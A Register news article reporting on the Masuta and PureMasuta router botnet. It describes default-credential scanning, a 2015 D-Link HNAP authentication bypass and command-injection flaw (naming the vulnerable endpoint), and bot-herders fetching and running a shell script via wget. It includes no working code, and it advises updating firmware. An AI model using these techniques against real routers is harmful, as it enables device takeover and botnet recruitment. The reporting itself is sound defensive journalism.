Security

Fresh botnet recruiting routers with weak credentials

With a special HNAP exploit just for D-Link kit

By Richard Chirgwin

2 SHARE

Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".

The early-January Satori botnet attacked a Huawei router zero-day. Masuta also hits routers.

According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of tapping devices for default credentials (hidden by a single XOR by 0x22, inspired by Mirai); and there's the more sophisticated “PureMasuta” which exploits an old network administration bug.

That bug was spotted back in 2015, when Craig Heffner identified a bug in D-Link's Home Network Administration Protocol. That's what Pure Masuta tries to exploit.

NewSky wrote:

It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.

Since the bug lets routers run anything after GetDeviceSettings, what PureMasuta's bot-herders do is run a wget to fetch and run a shell script, recruiting the device into its botnet.

If you have a vulnerable device – D-Link's AC300, for example – make sure you've got firmware newer than 2015.

NewSky's attribution of the botnet, to an entity they dub "Nexus Zeta", comes from the C&C URL nexusiotsolutions(dot)net, since this was the same URL as the Satori botnet used. ®

Sign up to our NewsletterGet IT in your inbox daily

2 Comments

More from The Register

Trend Micro tools tossed from Apple's Mac App Store after spewing fans' browser histories

Updated Data caught being siphoned off to outside server

Russia's national vulnerability database is a bit like the Soviet Union – sparse and slow

By design, though, not... er, general rubbishness

Malware-slinging scum copied D-Link's code-signing certificates to dress up PC nasties

Password-stealing backdoor lobbed at Windows boxes

Trend Micro AV nukes innocent Sharepoint code, admins despair

Servers fall over after JavaScript file trashed by mistake

North Korea's antivirus software whitelisted mystery malware

'SiliVaccine' uses ancient, stolen, Trend Micro AV engine and bad home-brew crypto

Brown pants moment for BlueJeans: Dozens of AV tools scream its vid chat code is malware

How it all happened (clue: unsigned library loaded)

US senators get digging to find out the truth about FCC DDoS attack

And why serial self-promoter John McAfee is a security expert on Russian hacking

Russian malware harvesting Telegram Desktop creds, chats

Python programmer may have outed himself on YouTube

World's biggest DDoS-for-hire souk shuttered, masterminds cuffed

Webstresser.org taken down by Europol plod and chums

DraftKings rides to court, asks to unmask 10 DDoS suspects

Fantasy sports outfit looks to hunt down group that bombarded its site